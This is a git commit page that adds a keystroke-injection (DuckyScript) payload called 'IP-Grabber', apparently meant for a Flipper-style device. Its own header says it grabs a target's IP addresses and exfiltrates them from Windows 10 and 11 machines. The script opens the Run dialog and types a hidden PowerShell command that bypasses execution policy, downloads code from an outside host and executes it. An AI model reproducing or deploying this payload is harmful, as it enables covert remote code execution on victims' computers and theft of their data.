Create IP-Grabber.txt
This commit is contained in:
parent
2d4568a737
commit
fe2228901f
1 changed files with 12 additions and 0 deletions
12
Payloads/Flip-IP-Grabber/IP-Grabber.txt
Normal file
12
Payloads/Flip-IP-Grabber/IP-Grabber.txt
Normal file
|
@ -0,0 +1,12 @@
|
|||
REM Title: IP-Grabber
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload is meant to do grab your targets IP addresses and exfil them
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/f0x | iex
|
||||
ENTER
|
Loading…
Add table
Add a link
Reference in a new issue